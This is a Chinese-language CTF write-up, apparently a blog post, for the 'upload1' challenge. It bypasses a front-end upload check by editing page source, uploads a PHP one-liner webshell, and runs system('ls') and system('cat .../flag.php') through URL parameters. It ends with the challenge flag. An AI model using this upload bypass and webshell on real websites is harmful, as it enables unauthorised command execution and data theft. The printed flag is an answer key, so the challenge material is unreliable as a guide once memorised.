攻防世界的里的upload1

攻防世界的里的upload1

点击后的页面

 

看一下我的一句话木马

明确目标,获取flag

1.判断上传文件漏洞

先传入.php文件,看是否拦截

 可以看出,我刚选择我的.php文件就被报错提示了,说明这是前端验证啊!

你看,还不让我上传,上传键还变灰色了

如何判断是否为前端验证?

上传.php文件,立即报错,并且你开了代理,截取不到包,这样妥妥的前端验证,因为前端直接把你的文件进行拦截了嘛

2.解决方法

前端验证,我们用最快的方法,直接修改页面源代码就行(这里建议使用火狐或者谷歌浏览器,我用微软浏览器,修改了也不行)

我们右键,选择检查——产看源代码

 查form

 删掉 οnchange="check();"

这个语句的意思就是一个事件,当带点击上传的时候触发,至于具体是什么事件,你可以自己看源代码

上传时又提示,我们再进行删除源代码,删除这个disable,点击上传 

上传成功后,我们获得路径,现在去调用这个一句话木马

 调用方法有很多,我们手动调用,蚁剑好像用不了,他防着的嘞。

2.调用一句话木马

1)手动调用

中间因为个人原因,换了一下一下代码,换成GET了,之前上传成POST了

现在我们测试一下,看上传的文件是否能用,这里我们使用phpinfo();测试,出现下面的图就代表可以使用。

http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=phpinfo();

我们去看看当前位置有什么文件,用system()函数

http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=system('ls');

可以看出我传了两次,也可以看出这时linux系统,因为我用的ls

 我们去根目录下看看

http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=system(%27ls%20/var/www/html%27);

看见flag.php文件了吧,打开看看

http://61.147.171.105:58114/upload/1683702988.shell(get).php?hack=system(%27cat%20/var/www/html/flag.php%27);

他是再检查里出现的,右键空白处,检查
flag="cyberpeace{c763321c1ebc2ab91da91506a35736f1}";

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值